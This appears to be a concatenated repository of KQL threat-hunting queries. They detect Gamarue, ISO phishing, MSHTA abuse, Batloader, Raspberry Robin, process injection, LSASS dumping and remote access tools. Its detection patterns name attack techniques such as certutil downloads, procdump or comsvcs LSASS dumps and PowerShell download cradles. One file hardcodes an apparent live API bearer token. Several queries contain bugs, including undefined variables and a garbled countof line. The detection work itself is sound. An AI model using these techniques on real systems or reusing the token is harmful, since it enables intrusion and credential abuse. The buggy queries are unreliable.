HKEY_USERS\{SID}\Software\​Microsoft\Windows\CurrentVersion​\Explorer\UserAssist for any registry modifications ending in .yax—.yax is the ROT13 encoded value of .lnk. While this won’t be a good detection opportunity on its own, it could be helpful to look for this registry value if you’re responding to a Gamarue incident to figure out where it came from and clean the USB drive. 37 | DeviceRegistryEvents 38 | | where ActionType =~ "RegistryValueSet" and RegistryValueName endswith ".yax" and RegistryKey endswith @"\Software\​Microsoft\Windows\CurrentVersion​\Explorer\UserAssist" 39 | ``` 40 | 41 | -------------------------------------------------------------------------------- /ISO_MOTW_Kusto_Queries.md: -------------------------------------------------------------------------------- 1 | # ISO File and MOTW related attack behaviours 2 | 3 | `//ISO or Image Mount Indicator in Recent Files 4 | //https://github.com/SigmaHQ/sigma/blob/d459483ef6bb889fb8da1baa17a713a4f1aa8897/rules/windows/file_event/file_event_win_iso_file_recent.yml 5 | //https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ 6 | //https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore 7 | //https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/ 8 | //https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/ 9 | //Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks. This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files. 10 | DeviceFileEvents 11 | | where ((FolderPath endswith @'.iso.lnk' or FolderPath endswith @'.img.lnk' or FolderPath endswith @'.vhd.lnk' or FolderPath endswith @'.vhdx.lnk') and (FolderPath contains @'\Microsoft\Windows\Recent\'))` 12 | 13 | `//Suspicious VHD, VHDX, or ISO Image Download From Browser 14 | //Malware can use mountable Virtual Hard Disk .vhd, .vhdx, .iso file to encapsulate payloads and evade security controls 15 | //Legitimate user creation potentially someone working with virtualisation software, IT services or training related 16 | //confirm hash of original file and validate source e.g. the site it was downloaded from. 17 | //https://github.com/SigmaHQ/sigma/blob/d459483ef6bb889fb8da1baa17a713a4f1aa8897/rules/windows/file_event/file_event_win_iso_file_recent.yml 18 | //https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ 19 | //https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore 20 | //https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/ 21 | //https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files 22 | DeviceFileEvents | where ((InitiatingProcessFolderPath endswith @'chrome.exe' or InitiatingProcessFolderPath endswith @'firefox.exe' or InitiatingProcessFolderPath endswith @'microsoftedge.exe' or InitiatingProcessFolderPath endswith @'microsoftedgecp.exe' or InitiatingProcessFolderPath endswith @'msedge.exe' or InitiatingProcessFolderPath endswith @'iexplorer.exe' or InitiatingProcessFolderPath endswith @'brave.exe' or InitiatingProcessFolderPath endswith @'opera.exe') and FolderPath has_any ('.vhd','.iso','.vhdx'))` 23 | 24 | `//ISO Image Mount: Detects the mount of ISO images on an endpoint 25 | //https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore 26 | //https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages 27 | //https://twitter.com/MsftSecIntel/status/1257324139515269121 28 | //https://github.com/SigmaHQ/sigma/blob/04f72b9e78f196544f8f1331b4d9158df34d7ecf/rules/windows/builtin/security/win_iso_mount.yml 29 | SecurityEvent 30 | | where ((EventID == 4663 and ObjectServer =~ @'Security' and ObjectType =~ @'File' and ObjectName contains @'\Device\CdRom') and (ObjectName !~ @'\Device\CdRom0\setup.exe'))` 31 | -------------------------------------------------------------------------------- /JavaScript_spawned_from_ISO.md: -------------------------------------------------------------------------------- 1 | # Queries from the Red Canary November Threat Blog: 2 | 3 | # JavaScript .js files executing from optical disc image ISOs 4 | `//Detection opportunity: JavaScript .js files executing from optical disc image ISOs 5 | //The following detection analytic identifies .js files executing from drives other than the default C:\ drive. Malware such as Qbot can be introduced through ISOs that contain malicious .js files. It is rare for .js files to execute from a drive other than the default drive. Since this may occur legitimately if the endpoint’s main partition is not on C:\: additional review may be needed to determine if this is malicious behavior. 6 | // https://redcanary.com/blog/intelligence-insights-november-2022/ 7 | DeviceProcessEvents 8 | | where FolderPath !startswith "c:" and FolderPath !startswith "/" and InitiatingProcessFolderPath !startswith "c:" and InitiatingProcessFolderPath !startswith "/" and FolderPath !startswith "\\\\" and InitiatingProcessFolderPath !startswith "\\\\" and isnotempty(InitiatingProcessFolderPath) and isnotempty(FolderPath) and FileName endswith ".js"` 9 | -------------------------------------------------------------------------------- /LOLBIN_MSHTA.md: -------------------------------------------------------------------------------- 1 | # LOLBIN - MSHTA 2 | 3 | ## MDE / Sentinel - network connections by MSHTA 4 | ``` 5 | //get renamed mshta.exe filenames and renamed mshta.exe filenames 6 | let mshtaFiles = DeviceImageLoadEvents 7 | | where InitiatingProcessVersionInfoOriginalFileName =~ "mshta.exe" | distinct InitiatingProcessFileName; 8 | //mshta.exe creating a network connection 9 | DeviceNetworkEvents 10 | | where InitiatingProcessFileName in~ (mshtaFiles) and RemoteIPType =~ "Public" 11 | ``` 12 | 13 | ## MDE / Sentinel - MSHTA renamed 14 | 15 | ``` 16 | //get renamed mshta.exe filenames and renamed mshta.exe filenames 17 | let mshtaFiles = DeviceImageLoadEvents 18 | | where InitiatingProcessVersionInfoOriginalFileName =~ "mshta.exe" | distinct InitiatingProcessFileName; 19 | //mshta.exe creating a network connection 20 | DeviceNetworkEvents 21 | | where InitiatingProcessFileName in~ (mshtaFiles) and RemoteIPType =~ "Public" 22 | ``` 23 | 24 | ## MDE / Sentinel - MSHTA leveraging protocol handlers to execute code 25 | 26 | ``` 27 | //find mshta executing code via protocol handlers 28 | let protocolHandlers = dynamic(["javascript","vbscript","about"]); 29 | //get renamed mshta.exe filenames and renamed mshta.exe filenames 30 | let mshtaFiles = DeviceImageLoadEvents 31 | | where InitiatingProcessVersionInfoOriginalFileName =~ "mshta.exe" | distinct InitiatingProcessFileName; 32 | DeviceProcessEvents 33 | | where ( InitiatingProcessFileName in~ (mshtaFiles) or FileName in~ (mshtaFiles) ) and ProcessCommandLine has_any (protocolHandlers) 34 | ``` 35 | 36 | ## MDE / Sentinel - MSHTA process execution with unusual process parent ancestry 37 | 38 | ``` 39 | // mshta process execution with unusual process parent ancestry 40 | //get renamed mshta.exe filenames and renamed mshta.exe filenames 41 | let mshtaFiles = DeviceImageLoadEvents 42 | | where InitiatingProcessVersionInfoOriginalFileName =~ "mshta.exe" | distinct InitiatingProcessFileName; 43 | DeviceProcessEvents 44 | //look for suspicious process parent ancestry 45 | | where (InitiatingProcessFileName in~ (mshtaFiles) or FileName in~ (mshtaFiles)) and (InitiatingProcessParentFileName in~ ("PowerShell.exe","cmd.exe") or InitiatingProcessFileName in~ ("PowerShell.exe","cmd.exe")) 46 | ``` 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /LolBin_Winlogon_Suspicious_Network_Connection.md: -------------------------------------------------------------------------------- 1 | # LolBin Winlogon Suspicious Network Connection 2 | 3 | # Tactics: Execution 4 | 5 | # Source 6 | 7 | - https://twitter.com/ellishlomo/status/1652312221156794369?t=sx5lxEpNYrwjRUNWgytRdQ&s=19 8 | 9 | 10 | # Description 11 | 12 | Find Winlogon with outbound connections #MDE 13 | 14 | Kusto: 15 | 16 | 17 | ``` 18 | DeviceProcessEvents 19 | | where FileName == "winlogon.exe" 20 | | where ActionType == "CreateRemoteThread" 21 | | join ( 22 | DeviceNetworkEvents 23 | | where RemoteIPType == "Public" 24 | ) on DeviceId 25 | ``` 26 | -------------------------------------------------------------------------------- /MDE_Execution_BatloaderTTPs.md: -------------------------------------------------------------------------------- 1 | # Batloader Execution Procedures 2 | 3 | ``` 4 | //Suspicious BatLoader Malware Execution by Use of Powershell (via cmdline) 5 | //https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html 6 | DeviceProcessEvents 7 | | where FileName endswith @'powershell.exe' and ProcessCommandLine has_all (@'\AppData\Roaming',@'Invoke-WebRequest','OutFile','update.bat','Start-Process') 8 | ``` 9 | 10 | ``` 11 | //Suspicious BatLoader Malware Execution by Use of Powershell (via cmdline) 12 | //https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html 13 | SecurityEvent 14 | | where EventID == 4688 15 | | where NewProcessName endswith @'\powershell.exe' and CommandLine has_all (@'\AppData\Roaming',@'Invoke-WebRequest','OutFile','update.bat','Start-Process') 16 | ``` 17 | 18 | ``` 19 | // Possible Batloader Malware Execution by Gpg4Win Tool (via process creation) 20 | // https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html 21 | SecurityEvent 22 | | where EventID == 4688 23 | | where NewProcessName endswith @'gpg2.exe' and CommandLine has_all (@'\AppData\Roaming',@'Invoke-WebRequest','OutFile','update.bat','Start-Process') 24 | ``` 25 | 26 | ``` 27 | // Possible Batloader Malware Execution by Gpg4Win Tool (via process creation) 28 | // https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html 29 | DeviceProcessEvents 30 | | where FileName endswith @'gpg2.exe' and ProcessCommandLine has_all (@'\AppData\Roaming',@'Invoke-WebRequest','OutFile','update.bat','Start-Process') 31 | ``` 32 | -------------------------------------------------------------------------------- /MasatdonC2_Kusto_Query.md: -------------------------------------------------------------------------------- 1 | # Mastodon used for C2 2 | 3 | # Instructions: 4 | Generate mastodon API bearer token to enumerate the servers to do this visit Mastodon instances at: https://instances.social/api/token# 5 | 6 | # Query to enumerate the API 7 | 8 | `curl -H 'Authorization: Bearer BBltUK9rXaGnXnFz2DYuPlybYwOw2ukriRWLIC6fyTO9BQWKkuhNAUZoOn5FTurGm72R9ELpihpeKBKC9w1MeRK4GvwrpmRlxc5neTZgzlE9fQ8zG2XfofJPgfvyJ0Ki' 'https://instances.social/api/1.0/instances/list?count=0' | jq ".instances[].name" | tr -d '"' > mastodon_servers.json` 9 | 10 | # Upload the results to Github or a storage account etc and then use the KQL external `data opperator` to use the list in your query. 11 | 12 | # Example Hunt Query 13 | 14 | `let exclusions = datatable (filepattern:string)["mastodon.exe","Discord.exe","firefox.exe","msedge.exe","chrome.exe","telegram.exe","brave.exe","ExpressConnectNetworkService.exe","sidekick.exe"]; 15 | let mastodonServers1 = externaldata (domain:string)[@'https://raw.githubusercontent.com/m4nbat/mastodon_servers/main/mastodon_1-9999.txt']; 16 | let mastodonServers2 = externaldata (domain:string)[@'https://raw.githubusercontent.com/m4nbat/mastodon_servers/main/mastodon_10000-17175.txt']; 17 | // e.g. let iocs = externaldata (ip:string, hash:string, domain:string)[@'https://my-external-lookup.com/ioc.csv']; 18 | //to generate mastodon bearer token go here: https://instances.social/api/token# 19 | // to grab all mastodon servers use: curl -H 'Authorization: Bearer BBltUK9rXaGnXnFz2DYuPlybYwOw2ukriRWLIC6fyTO9BQWKkuhNAUZoOn5FTurGm72R9ELpihpeKBKC9w1MeRK4GvwrpmRlxc5neTZgzlE9fQ8zG2XfofJPgfvyJ0Ki' 'https://instances.social/api/1.0/instances/list?count=0' | jq ".instances[].name" | tr -d '"' > mastodon_servers.json 20 | DeviceNetworkEvents 21 | | where TimeGenerated > ago(14d) 22 | | where RemoteUrl has_any (iocs) or RemoteUrl has_any (mastodonServers2) 23 | | where InitiatingProcessFileName !in~ (exclusions)` 24 | -------------------------------------------------------------------------------- /OneNote_Related_Hunting_Queries.md: -------------------------------------------------------------------------------- 1 | # OneNote spawning suspicious child processes 2 | The following pseudo-detection analytic identifies OneNote as a parent process for suspicious child processes. This is not a new type of analytic; historically they have been useful for detecting suspicious Excel child processes. The same type of logic can be leveraged to detect suspicious OneNote activity. This pseudo-analytic would need to be updated as adversaries change which processes they start with OneNote, so an alternative option would be to detect any child processes spawned from Office applications. 3 | 4 | ## OneNote spawning suspicious child processes 5 | The following detection analytic identifies OneNote as a parent process for suspicious child processes. This is not a new type of analytic; historically they have been useful for detecting suspicious Excel child processes. The same type of logic can be leveraged to detect suspicious OneNote activity. This pseudo-analytic would need to be updated as adversaries change which processes they start with OneNote, so an alternative option would be to detect any child processes spawned from Office applications. 6 | 7 | 8 | `DeviceProcessEvents 9 | | where InitiatingProcessFileName =~ "onenote.exe" and FileName in~ ("cmd.exe","powershell.exe",wscript.exe,"jscript.exe")` 10 | 11 | 12 | ## OneNote Url connections (can be noisy) good for frequency analysis or enriching with IoA / IoC data 13 | 14 | `DeviceEvents 15 | | where ActionType =~ "BrowserLaunchedToOpenUrl" and InitiatingProcessFileName in~ ("onenote.exe") and RemoteUrl !startswith @"C:\Users\"` 16 | 17 | 18 | ## Possible OneNote phishing using a shared link 19 | 20 | `let exclusionDomain = datatable(domain:string)["exampledomain.com"]; 21 | EmailEvents 22 | | join EmailUrlInfo on NetworkMessageId 23 | | where Url has_all ("my.sharepoint.com","personal") and Subject has_all ("shared") and SenderFromDomain !in~ (exclusionDomain);` 24 | -------------------------------------------------------------------------------- /PSExec_Process_Creation_Impacket_Metasploit.md: -------------------------------------------------------------------------------- 1 | # PsExec Process Creation (Metasploit / Impacket) 2 | 3 | ## Source: Cyborg / SIGMA 4 | 5 | ## T1569.002: System Services: Service Execution 6 | 7 | ## Sentinel 8 | 9 | `DeviceProcessEvents 10 | | where InitiatingProcessFileName has "services.exe" 11 | | where FolderPath matches regex "C:\\\\Windows\\\\[a-zA-Z]{8}.exe" 12 | | project TimeGenerated, DeviceName, ActionType, AccountName, AccountDomain, FileName, FolderPath, ProcessId, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessFolderPath, InitiatingProcessId, InitiatingProcessParentFileName, InitiatingProcessParentId, InitiatingProcessAccountDomain, InitiatingProcessAccountName, ProcessVersionInfoCompanyName, ProcessVersionInfoProductName, ProcessVersionInfoProductVersion, ProcessVersionInfoInternalFileName, ProcessVersionInfoOriginalFileName, ProcessVersionInfoFileDescription, FileSize, SHA256 13 | | order by TimeGenerated` 14 | 15 | `SecurityEvent 16 | | where ParentProcessName has "services.exe" 17 | | where NewProcessName matches regex "C:\\\\Windows\\\\[a-zA-Z]{8}.exe" 18 | | where EventID == "4688" 19 | | project EventID, NewProcessName, CommandLine, Computer, ParentProcessName` 20 | 21 | ## MDE 22 | 23 | `DeviceProcessEvents 24 | | where InitiatingProcessFileName has "services.exe" 25 | | where FolderPath matches regex "C:\\\\Windows\\\\[a-zA-Z]{8}.exe" 26 | | project Timestamp, DeviceName, ActionType, AccountName, AccountDomain, FileName, FolderPath, ProcessId, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessFolderPath, InitiatingProcessId, InitiatingProcessParentFileName, InitiatingProcessParentId, InitiatingProcessAccountDomain, InitiatingProcessAccountName, ProcessVersionInfoCompanyName, ProcessVersionInfoProductName, ProcessVersionInfoProductVersion, ProcessVersionInfoInternalFileName, ProcessVersionInfoOriginalFileName, ProcessVersionInfoFileDescription, FileSize, SHA256 27 | | order by Timestamp` 28 | -------------------------------------------------------------------------------- /PowerShell_create_LNK_in_startup.md: -------------------------------------------------------------------------------- 1 | # PowerShell creating LNK files within a startup directory 2 | 3 | # Source: https://redcanary.com/blog/intelligence-insights-december-2022/ 4 | 5 | `//PowerShell creating LNK files within a startup directory 6 | //The following detection analytic identifies PowerShell creating LNK files in a startup directory. Malware like Yellow Cockatoo can be introduced as a fake installer binary, resulting in malicious PowerShell script execution. Some benign homegrown utilities or installers may create .lnk files in startup locations, so additional investigation of the activity may be necessary. 7 | //https://redcanary.com/blog/intelligence-insights-december-2022/ 8 | let trusedUtilsInstallingLnkInStartup = datatable (util:string)["mytrustedutility.exe"]; 9 | DeviceFileEvents 10 | | where ActionType =~ "FileCreated" and InitiatingProcessFileName =~ "powershell.exe" and FolderPath contains @"start menu\programs\startup" and not(InitiatingProcessCommandLine has_any (trusedUtilsInstallingLnkInStartup))` 11 | -------------------------------------------------------------------------------- /Raspberry_Robin_Kusto_Queries.md: -------------------------------------------------------------------------------- 1 | # Raspberry Robin Hunts 2 | 3 | # RaspeberryRobin detect msiexec.exe downloading and executing packages 4 | `//RaspeberryRobin detect msiexec.exe downloading and executing packages 5 | // https://redcanary.com/blog/raspberry-robin/ 6 | DeviceProcessEvents 7 | | where (InitiatingProcessFileName =~ "msiexec.exe" or FileName =~ "msiexec.exe") 8 | | where ProcessCommandLine has_any ("http:","https:") and (ProcessCommandLine contains '/q' or ProcessCommandLine contains '-q')` 9 | 10 | # RaspeberryRobin detect a legitimate Windows utility, fodhelper.exe, which in turn spawns rundll32.exe to execute a malicious command. 11 | `//RaspeberryRobin detect a legitimate Windows utility, fodhelper.exe, which in turn spawns rundll32.exe to execute a malicious command. Processes launched by fodhelper.exe run with elevated administrative privileges without requiring a User Account Control prompt. It is unusual for fodhelper.exe to spawn any processes as the parent, making this another useful detection opportunity. 12 | // https://redcanary.com/blog/raspberry-robin/ 13 | DeviceProcessEvents 14 | | where InitiatingProcessParentFileName =~ "fodhelper.exe" 15 | | project DeviceName, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessCommandLine` 16 | 17 | # RaspeberryRobin Detect the Windows Open Database Connectivity utility loading a configuration file or DLL. 18 | `//RaspeberryRobin Detect the Windows Open Database Connectivity utility loading a configuration file or DLL. The /A flag specifies an action, /F uses a response file, and /S runs in silent mode. Odbcconf.exe running rgsvr actions in silent mode could indicate misuse. 19 | // https://redcanary.com/blog/raspberry-robin/ 20 | DeviceProcessEvents 21 | | where (FileName =~ "odbcconf.exe" or InitiatingProcessFileName =~ "odbcconf.exe") and (ProcessCommandLine contains "regsvr") 22 | | where (ProcessCommandLine contains '/f' or ProcessCommandLine contains '-f' or ProcessCommandLine contains '/a' or ProcessCommandLine contains '-a' or ProcessCommandLine contains '/s' or ProcessCommandLine contains '-s')` 23 | 24 | # RaspberryRobin detect network connections from the command line with no parameters 25 | `//RaspberryRobin detect network connections from the command line with no parameters 26 | // https://redcanary.com/blog/raspberry-robin/ 27 | DeviceNetworkEvents 28 | | where RemoteIPType =~ "Public" and InitiatingProcessFileName in~ ("regsvr32.exe","rundll32","dllhost") and InitiatingProcessCommandLine =~ ""` 29 | -------------------------------------------------------------------------------- /RedCanary2023-ObfuscatedFilesorInfo.md: -------------------------------------------------------------------------------- 1 | # Red Canary Threat Report - Obfuscated Files and Information 2 | 3 | **Source:** https://redcanary.com/threat-detection-report/techniques/obfuscated-files-information/ 4 | 5 | **Experimental hunting queries based on Red Canary threat report (Untested)** 6 | 7 | ## Detecting Base64 encoding 8 | If you’re looking to detect malicious use of Base64 encoding, consider monitoring for the execution of processes like powershell.exe or cmd.exe along with command lines containing parameters like ToBase64String and FromBase64String. 9 | 10 | 11 | **Pseudocode:** process == ('powershell.exe' || 'cmd.exe') && command_includes ('base64') 12 | 13 | **Kusto:** 14 | `TBA` 15 | 16 | 17 | ## PowerShell -EncodedCommand switch 18 | Use of the -EncodedCommand PowerShell switch represents the most common form of obfuscation that we detect across the environments we monitor. 19 | 20 | **Pseudocode:** process == powershell.exe && command_includes [any variation of the encoded command switch]* 21 | 22 | **Kusto:** 23 | 24 | `DeviceProcessEvents 25 | | where FileName =~ "powershell.exe" and ProcessCommandLine has_any ("-e","-en","-enc","-enco","-encod","-encode","-encoded","-encodedc","-encodedco","-encodedcom","-encodedcomm","-encodedcomma","-encodedcomman","-encodedcommand")` 26 | 27 | ## Escape characters 28 | Consider alerting on command lines containing excessive use of characters associated with obfuscation, like `^= % ! [ ( ;. 29 | 30 | **Pseudocode:** process == cmd.exe && command_includes [excessive use of the following] ('^' || '=' || '%' || '!' || '[' || '(' || ';') 31 | 32 | **Kusto:** 33 | 34 | `DeviceProcessEvents | where InitiatingProcessFileName endswith "cmd.exe" or FileName endswith "cmd.exe" | extend a = countof(@'InitiatingProcessCommandLine" > tweet.txt & type tweet.txt','^') | extend b = countof(@'InitiatingProcessCommandLine" > tweet.txt & type tweet.txt','=') | extend c = countof(@'InitiatingProcessCommandLine" > tweet.txt & type tweet.txt','%') | extend d = countof(@'InitiatingProcessCommandLine" > tweet.txt & type tweet.txt','!') | extend e = countof(@'InitiatingProcessCommandLine" > tweet.txt & type tweet.txt','[') | extend f = countof(@'InitiatingProcessCommandLine" > tweet.txt & type tweet.txt','(') | extend g = countof(@'InitiatingProcessCommandLine" > tweet.txt & type tweet.txt',';') | extend suspiciousChars = a + b + c + d + e + f + g | where suspiciousChars > 4` 35 | 36 | 37 | ## ZIP file spawning JavaScript 38 | We’ve detected high volumes of obfuscation this year looking for apparent phishing schemes where adversaries conceal JavaScript payloads in ZIP files and write them to the users and temp directories. 39 | 40 | **Pseudocode:** process == 'wscript.exe' && command_includes ('users' && 'temp' && '.zip’ && '.js') && 41 | has_external_netconn 42 | 43 | **Kusto:** 44 | 45 | `DeviceNetworkEvents 46 | | where InitiatingProcessFileName =~ "wscript.exe" and InitiatingProcessCommandLine has_any ('users','temp') and InitiatingProcessCommandLine has_any ('.zip','.js') and ipv4_is_private(RemoteIP) == false` 47 | 48 | `DeviceFileEvents 49 | | where ActionType =~ "FileCreated" and FolderPath has_any ("temp","users") and FileName endswith ".js"` 50 | 51 | -------------------------------------------------------------------------------- /RedCanary2023-ProcessInjection.md: -------------------------------------------------------------------------------- 1 | # Process Injection 2 | Process Injection continues to be a versatile tool that adversaries lean on to evade defensive controls and gain access to sensitive systems and information. 3 | 4 | ## Source 5 | https://redcanary.com/threat-detection-report/techniques/process-injection/ 6 | 7 | ## Kusto Queries 8 | 9 | ### PowerShell injecting into anything 10 | `let exclusions = datatable (processFileName:string,processFolderPath:string)["MsMpEng.exe",@"C:\ProgramData\Microsoft\Windows Defender\Platform\","MsSense.exe",@"C:\Program Files\Windows Defender Advanced Threat Protection"]; 11 | DeviceEvents 12 | | where ActionType =~ "ReadProcessMemoryApiCall" and FileName =~ "powershell.exe" 13 | | where InitiatingProcessFileName !in~ (exclusions) and InitiatingProcessFolderPath !in~ (exclusions)` 14 | 15 | ### Process executing sans command lines 16 | One major tell for process injection is the absence of command lines. Detecting the absence of anything, including a command line, can be tricky, and this pseudo-analytic only works for processes where you expect corresponding commands. However, you may be able to iterate on the following amalgamation of detection logic to improve detection coverage. 17 | 18 | `DeviceProcessEvents 19 | | where FileName in ('backgroundtaskhost.exe', 'svchost.exe', 'dllhost.exe', 'werfault.exe', 'searchprotocolhost.exe', 'wuauclt.exe', 'spoolsv.exe', 'rundll32.exe', 'regasm.exe', 'regsvr32.exe', 'regsvcs.exe') 20 | //regex to extract the commandline following a windows binary as MDE commandline field usually contains "123.exe" or '123.exe' or 123.exe followed by a command. 21 | | where ProcessCommandLine matches regex "(['\"]?\\w+\\.exe['\"]?)(\\s+.+)?$" 22 | //regex to extract the commandline after the .exe 23 | | extend CommandLineArgs = extract("(['\"]?\\w+\\.exe['\"]?)(\\s+.+)?$", 2, ProcessCommandLine) 24 | | where isempty(CommandLineArgs)` 25 | 26 | ### Network connections where there shouldn’t be 27 | Detecting purely on processes making network connections has the potential to generate a torrent of false positives. However, it can also identify suspicious injection activity—particularly if you tune the logic to filter out the eccentricities in your specific environment. 28 | 29 | `let FileNames = datatable(name:string)["notepad.exe","calc.exe"]; 30 | DeviceNetworkEvents 31 | | where InitiatingProcessFileName in~ (FileNames)` 32 | 33 | 34 | ### Injection into LSASS 35 | Since injection into lsass.exe is common, impactful, and frequently suspicious, it deserves to be called out individually. To that point, it would be worth your time to determine and enumerate the processes in your environment that routinely or occasionally obtain a handle to lsass.exe. Any access outside of the baseline should be treated as suspicious. 36 | 37 | `let exclusions = datatable (processFileName:string,processFolderPath:string)["healthservice.exe",@"C:\Program Files\Microsoft Monitoring Agent\Agent", 38 | "MsMpEng.exe",@"C:\ProgramData\Microsoft\Windows Defender\Platform\","MsSense.exe",@"C:\Program Files\Windows Defender Advanced Threat Protection"]; 39 | DeviceEvents 40 | | where ActionType =~ "ReadProcessMemoryApiCall" and FileName =~ "lsass.exe" and (InitiatingProcessFileName !in~ (exclusions) and InitiatingProcessFolderPath !in~ (exclusions))` 41 | 42 | ### Suspected LSASS Dump 43 | 44 | `DeviceProcessEvents 45 | | where InitiatingProcessCommandLine has_all ("procdump", "lsass") or InitiatingProcessCommandLine has_all ("rundll32", "comsvcs", "MiniDump")` 46 | 47 | ### Use to look for unusual cross process injection 48 | 49 | `let lolbins = datatable (file:string)["rundll32.exe","MSbuild.exe","PowerShell.exe","Wscript.exe","Cscript.exe","Msiexec.exe","Rundll32"]; 50 | DeviceEvents 51 | | where ActionType =~ "ReadProcessMemoryApiCall" and InitiatingProcessFileName in~ (lolbins)` 52 | 53 | 54 | -------------------------------------------------------------------------------- /RedCanary2023-ServiceExecution.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /RedCanary2023_IngressToolTransfer.md: -------------------------------------------------------------------------------- 1 | # Ingress Tool Transfer 2 | After gaining a foothold in a victim environment, adversaries often deploy non-native tools for lateral movement and other post-exploitation activity. 3 | 4 | ## Source: https://redcanary.com/threat-detection-report/techniques/ingress-tool-transfer/ 5 | 6 | ## Suspicious PowerShell commands 7 | Adversaries leverage PowerShell for ingress tool transfer more than any other tool. As such, monitoring for PowerShell process execution in conjunction with suspicious PowerShell commands in the command line can be a fruitful way to detect malicious ingress tool transfers. 8 | 9 | process == powershell.exe && command_includes ('downloadstring' || 'downloadata' || 'downloadfile' || 'iex' || '.invoke' || 'invoke-expression') 10 | 11 | `DeviceProcessEvents 12 | | where FileName =~ "powershell.exe" and ProcessCommandLine has_any ('downloadstring','downloadata','downloadfile','iex','.invoke','invoke-expression')` 13 | 14 | 15 | ## CertUtil downloading malicious binaries 16 | Adversaries often bypass security controls by using the Windows Certificate Utility (certutil.exe) to download malicious code. In general, they leverage certutil.exe along with the -split command-line option. 17 | 18 | process == certutil.exe && command_includes ('urlcache' && 'split') 19 | 20 | `DeviceProcessEvents 21 | | where FileName =~ "certutil.exe" and ProcessCommandLine has_any ('urlcache','split')` 22 | 23 | ## BITSAdmin downloading malicious binaries 24 | It’s not unusual for adversaries, including ones who peddle ransomware, to use BITSAdmin to download arbitrary files from the internet in an effort to evade application blocklisting. The following analytic will look for the execution of bitsadmin.exe with command options that suggest a file is being downloaded: 25 | 26 | process== bitsadmin.exe && command_includes (download' || 'transfer') 27 | 28 | `DeviceProcessEvents 29 | | where FileName =~ "bitsadmin.exe" and ProcessCommandLine has_any ('download','transfer')` 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /RedCanary2023_PowerShell.md: -------------------------------------------------------------------------------- 1 | Source: 2 | 3 | 4 | 5 | ## Child process or rundll32 with a webrequest in the commandline 6 | 7 | `DeviceImageLoadEvents 8 | | where InitiatingProcessParentFileName =~ "rundll32.exe" and InitiatingProcessCommandLine has_any ("iwr","Invoke-webrequest")` 9 | 10 | ## Weeding out partial matches of iex or iwr using regex 11 | 12 | `DeviceProcessEvents 13 | | where ProcessCommandLine matches regex @"[^\w]iex[^\w]|invoke-expression"` 14 | 15 | `DeviceProcessEvents 16 | | where ProcessCommandLine matches regex @"[^\w]iwr[^\w]|invoke-webrequest"` 17 | 18 | ## system.management.automation.dll 19 | 20 | let excludedParentProcesses = datatable (process:string)["SenseIR.exe","SenseCM.exe"]; 21 | DeviceImageLoadEvents 22 | | where FileName contains "system.management.automation.dll" and InitiatingProcessParentFileName !in~ (excludedParentProcesses) 23 | | project InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessCommandLine 24 | 25 | -------------------------------------------------------------------------------- /Regsvr32ExternalScriptLoad.md: -------------------------------------------------------------------------------- 1 | # Regsvr32.exe loading scripts or files from external sources 2 | 3 | ## Source: Microsoft 4 | 5 | // Finds regsvr32.exe command line executions that loads scriptlet files from remote sites. 6 | // This technique could be used to avoid application whitelisting and antimalware protection. 7 | DeviceNetworkEvents 8 | | where Timestamp > ago(7d) 9 | | where InitiatingProcessFileName =~ "regsvr32.exe" and InitiatingProcessCommandLine contains "/i:http" 10 | | project Timestamp, DeviceName, RemoteUrl, RemoteIP, InitiatingProcessCommandLine, InitiatingProcessParentFileName 11 | | top 100 by Timestamp 12 | -------------------------------------------------------------------------------- /Remote_Access_Tools.md: -------------------------------------------------------------------------------- 1 | # Remote Access Tools 2 | 3 | ### Experimental at present as I wrote these on my phone on a train 😁 4 | 5 | Catch all detection analytic - datatable needs expanding !!! 6 | 7 | let RATs = datatable (name:string)["action1","anydesk","gotoassist","logmein","teamviewer","vnc"]; 8 | let RATNames = DeviceFileEvents 9 | | where InitiatingProcessVersionInfoOriginalFileName has_any (RATs) or FileName contains has_any (RATs) | distinct FileName; 10 | DeviceNetworkEvents | where InitiatingProcessFileName in~ (RATNames) and ActionType contains "connection" 11 | 12 | let RATs = datatable (name:string)["action1","anydesk","gotoassist","logmein","teamviewer","vnc"]; 13 | let RATNames = DeviceFileEvents 14 | | where InitiatingProcessVersionInfoOriginalFileName has_any (RATs) or FileName contains has_any (RATs) | distinct FileName; 15 | DeviceProcessEvents | where InitiatingProcessFileName in~ (RATNames) or FileName in~ (RATFileNames) or InitiatingProcessParentFileName in~ (RATFileNames) 16 | 17 | # Action1 RAT 18 | 19 | **Source:** 